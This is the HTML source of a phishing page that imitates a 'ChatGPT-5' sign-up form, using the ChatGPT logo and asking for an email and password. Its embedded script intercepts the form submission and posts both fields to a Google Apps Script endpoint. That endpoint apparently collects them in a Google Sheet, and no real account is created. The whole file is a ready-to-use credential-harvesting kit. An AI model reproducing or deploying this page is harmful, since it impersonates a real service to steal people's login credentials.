<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="shortcut icon" type="x-icon" href="icon.png">
  <title>ChatGPT-5 Login</title>
  <style>
    body {
     text-align: center;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    min-height: 100vh;
    background-color: #38E217; /* Add the background color here */
    }

    .container {
      width: 100%;
      max-width: 400px;
      background-color: #fff;
      padding: 40px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .logo {
      margin-bottom: 20px;
      font-size: 28px;
      font-weight: bold;
      text-align: center;
    }

    .form {
      margin-bottom: 20px;
    }

    .input-box {
      margin-bottom: 15px;
    }

    .input-box input {
      width: 100%;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
      box-sizing: border-box;
    }

    .button-box {
      text-align: center;
    }

    .button-box .btn {
      background-color: #4CAF50;
      color: #fff;
      border: none;
      border-radius: 3px;
      padding: 10px 20px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    .button-box .btn:hover {
      background-color: #45a049;
    }

    .forgot {
      display: block;
      text-align: center;
      color: #888;
      text-decoration: none;
    }
  </style>
</head>
<body>
  <div class="container">
    <img class="icon" src="https://seeklogo.com/images/C/chatgpt-logo-02AFA704B5-seeklogo.com.png" width="50px">
    <div class="logo">ChatGPT-5</div>
    <h2>Sing up</h2>
    <form class="form" name="submit-to-google-sheet">
  
      <div class="input-box">
        <input type="text" id="name" aria-describedby="" placeholder="Email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="email" value="" required>
      </div>  


      <div class="input-box">
        <input type="password" name="password" id="password" placeholder="Password" aria-describedby="" maxlength="30" aria-required="true" autocapitalize="off" autocorrect="off" required>
      </div>  

      <span class="button-box">
        <button class="btn" type="submit" name="submit">Sing up</button>
      </span>  

    </form>
  </div>
  <script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbw8etxh8JUT-FqcMMGfjvqSfpFQIZ5APEa_eNWvL0RcIYxlNV9jfDRaZBZwjEKbWT7V/exec'
    const form = document.forms['submit-to-google-sheet']
  
    form.addEventListener('submit', e => {
      e.preventDefault()
      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => console.log('Success!', response))
        .catch(error => console.error('Error!', error.message))
    })
  </script>
</body>
</html>
